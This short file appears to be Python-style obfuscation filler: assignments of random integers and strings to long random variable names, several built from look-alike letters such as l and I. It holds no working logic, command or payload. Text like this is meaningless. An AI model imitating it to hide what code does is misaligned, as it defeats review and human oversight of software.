KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK = 204
vEezNBnEXTjiUiLfemAmTutEqOBYRGJWbeOYkNvYyprzJCOlysAKOJcuwoznVivDedCmAlykwuyucgL141 = "myoPYOlzYyZgKeOIdiRlJeIapEwIAIrrMXZjUuRaTlMouJsMbIbYaRkFClZFmuHJOqUdjKkMAubanGs"
lIlIIIIlIlIlIIIllIllllIIIIIIIlllIIIIIIlllIIlIIIIIIlIIIlllIIIIlllIlllIIIlIIlIIIIIlIllIIIIllIIIllllIIIIlIlIlllllIIlIIllIlIllllIlllIIllIIIIlllllIl = 600
IllIllIIlllIllIIIIIlIIlIIlIlllIlIIlIllIllIIIlIIIllIIlIIIlIIlIlIIIlIlIIIllIIIlIIIIllIlIIlIIllIIllIlllIlIIllIIIlllIllIlIlIIllIlllIlIllIllIIIIlIlIlI = "TPKHAsszHJdvPZourIsqwqDOhNYrgznxTMvBCXBbHuffJrgTVkTSwSRpFhsCXfyVSXqXyPNTpjbKUwa"
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = 201
InFAJYlhSGstpdJCVxbdjkFmFWtJzWrCjXACtoBrwaxnsnhdvAPnuFcvJGOvmpXmfWfuIXGEbJPVwWE149 = "otmbvEfPFIVWYJhjAPXAdrRAXhIykKLEUXIxeiACJnonniAQjCOaZqdNUBzgrDirIsVAAbOZYCidIqY"
aAaaAAAaAAAAAAaAaAAAAAAAAAaAaaaAaAAAAAaAAAaAAaaaAAAaaAAaAaaAAAaAaaaaAaAAAaaaaaaaaaAAaaaAaaaAAAAAAaAaAAAaaaaaaAaAAaAAAAaAAAAaaaaAaAAAaAaAAAaaaAAaaAaaAAA = 161
lIlllIlllIlIIlIIllIlIIIIIllIlIIIllIlllllllIlllIIIIlIlIlllllIllIlIlIIIlIIIlllIIllIIIllIllIIIIIIlIlIIlIIlIllIIlllllllllIllIIlIIlIIIllIIllIIlIIlIlIIlllIllIl = 645
P155 = 265
Z157 = 285
w1682312003391312159 = "taqSVFpmsnAzCEgzUtPmsNYvcxaQKkxgwOKXjMLwRwxGQganZRZexvUTUiNiZeOvUgLGnWzBaKuTPlU"
sKeTUPBChnrOIPUqxAQblIeNJEksisKzczOCsRYHgEoReEPyAIPqzUIAQioGtGbXaycUaWjkQGwQEgR161 = 876
V163 = 194